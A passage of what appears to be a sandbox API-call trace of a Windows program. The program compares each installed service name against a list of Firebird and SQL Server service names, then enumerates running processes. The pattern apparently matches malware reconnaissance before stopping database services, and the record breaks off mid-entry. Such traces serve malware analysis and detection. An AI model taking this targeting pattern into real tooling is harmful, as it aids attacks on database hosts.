(lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0222.770] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0222.770] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0222.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0222.770] lstrlenW (lpString="BITS") returned 4 [0222.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0222.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0222.770] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0222.770] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0222.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0222.770] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0222.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0222.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0222.770] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0222.770] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0222.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0222.770] lstrlenW (lpString="CDPSvc") returned 6 [0222.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0222.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0222.770] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0222.770] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0222.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0222.771] lstrlenW (lpString="ClickToRunSvc") returned 13 [0222.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0222.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0222.771] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0222.771] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0222.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0222.771] lstrlenW (lpString="ClipSVC") returned 7 [0222.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0222.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0222.771] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0222.771] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0222.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0222.771] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0222.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0222.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0222.771] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0222.771] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0222.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0222.771] lstrlenW (lpString="CryptSvc") returned 8 [0222.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0222.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0222.771] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0222.771] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0222.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0222.771] lstrlenW (lpString="DcomLaunch") returned 10 [0222.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0222.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0222.771] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0222.771] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0222.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0222.771] lstrlenW (lpString="DeviceAssociationService") returned 24 [0222.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0222.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0222.771] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0222.771] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0222.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0222.772] lstrlenW (lpString="Dhcp") returned 4 [0222.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0222.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0222.772] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0222.772] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0222.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0222.772] lstrlenW (lpString="Dnscache") returned 8 [0222.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0222.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0222.772] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0222.772] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0222.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0222.772] lstrlenW (lpString="DoSvc") returned 5 [0222.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0222.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0222.772] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0222.772] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0222.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0222.772] lstrlenW (lpString="DPS") returned 3 [0222.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0222.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0222.772] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0222.772] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0222.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0222.772] lstrlenW (lpString="DusmSvc") returned 7 [0222.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0222.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0222.772] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0222.772] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0222.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0222.772] lstrlenW (lpString="EventLog") returned 8 [0222.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0222.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0222.772] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0222.773] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0222.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0222.773] lstrlenW (lpString="EventSystem") returned 11 [0222.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0222.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0222.773] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0222.773] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0222.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0222.773] lstrlenW (lpString="FontCache") returned 9 [0222.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0222.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0222.773] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0222.773] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0222.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0222.773] lstrlenW (lpString="gpsvc") returned 5 [0222.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0222.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0222.773] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0222.773] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0222.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0222.773] lstrlenW (lpString="iphlpsvc") returned 8 [0222.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0222.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0222.773] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0222.773] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0222.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0222.773] lstrlenW (lpString="KeyIso") returned 6 [0222.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0222.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0222.773] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0222.773] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0222.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0222.773] lstrlenW (lpString="LanmanServer") returned 12 [0222.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0222.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0222.773] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0222.774] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0222.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0222.774] lstrlenW (lpString="LanmanWorkstation") returned 17 [0222.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0222.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0222.774] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0222.774] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0222.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0222.774] lstrlenW (lpString="lfsvc") returned 5 [0222.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0222.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0222.774] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0222.774] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0222.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0222.774] lstrlenW (lpString="LicenseManager") returned 14 [0222.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0222.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0222.774] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0222.774] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0222.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0222.774] lstrlenW (lpString="lmhosts") returned 7 [0222.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0222.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0222.774] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0222.774] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0222.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0222.774] lstrlenW (lpString="LSM") returned 3 [0222.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0222.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0222.774] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0222.774] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0222.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0222.774] lstrlenW (lpString="MpsSvc") returned 6 [0222.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0222.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0222.775] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0222.775] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0222.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0222.775] lstrlenW (lpString="NcbService") returned 10 [0222.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0222.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0222.775] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0222.775] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0222.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0222.775] lstrlenW (lpString="netprofm") returned 8 [0222.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0222.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0222.775] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0222.775] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0222.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0222.775] lstrlenW (lpString="NlaSvc") returned 6 [0222.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0222.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0222.775] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0222.775] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0222.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0222.775] lstrlenW (lpString="nsi") returned 3 [0222.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0222.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0222.775] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0222.775] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0222.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0222.775] lstrlenW (lpString="PcaSvc") returned 6 [0222.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0222.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0222.775] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0222.775] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0222.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0222.775] lstrlenW (lpString="PlugPlay") returned 8 [0222.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0222.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0222.776] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0222.776] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0222.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0222.776] lstrlenW (lpString="Power") returned 5 [0222.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0222.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0222.776] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0222.776] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0222.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0222.776] lstrlenW (lpString="ProfSvc") returned 7 [0222.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0222.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0222.776] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0222.776] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0222.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0222.776] lstrlenW (lpString="RpcEptMapper") returned 12 [0222.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0222.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0222.776] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0222.776] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0222.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0222.776] lstrlenW (lpString="RpcSs") returned 5 [0222.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0222.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0222.776] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0222.776] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0222.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0222.776] lstrlenW (lpString="SamSs") returned 5 [0222.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0222.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0222.776] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0222.776] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0222.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0222.776] lstrlenW (lpString="Schedule") returned 8 [0222.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0222.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0222.777] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0222.777] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0222.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0222.777] lstrlenW (lpString="SecurityHealthService") returned 21 [0222.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0222.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0222.777] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0222.777] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0222.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0222.777] lstrlenW (lpString="SENS") returned 4 [0222.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0222.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0222.777] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0222.777] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0222.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0222.777] lstrlenW (lpString="ShellHWDetection") returned 16 [0222.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0222.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0222.777] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0222.777] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0222.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0222.777] lstrlenW (lpString="Spooler") returned 7 [0222.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0222.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0222.777] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0222.777] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0222.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0222.777] lstrlenW (lpString="sppsvc") returned 6 [0222.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0222.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0222.777] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0222.777] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0222.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0222.777] lstrlenW (lpString="SSDPSRV") returned 7 [0222.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0222.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0222.778] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0222.778] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0222.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x45c [0222.782] Process32FirstW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.783] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.784] lstrlenW (lpString="System") returned 6 [0222.784] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.784] lstrlenW (lpString="smss.exe") returned 8 [0222.785] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.785] lstrlenW (lpString="csrss.exe") returned 9 [0222.785] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.786] lstrlenW (lpString="wininit.exe") returned 11 [0222.786] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.787] lstrlenW (lpString="csrss.exe") returned 9 [0222.787] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.787] lstrlenW (lpString="winlogon.exe") returned 12 [0222.788] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.788] lstrlenW (lpString="services.exe") returned 12 [0222.788] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.789] lstrlenW (lpString="lsass.exe") returned 9 [0222.789] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.790] lstrlenW (lpString="svchost.exe") returned 11 [0222.790] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0222.790] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0222.791] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0222.791] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0222.791] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.792] lstrlenW (lpString="svchost.exe") returned 11 [0222.792] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, 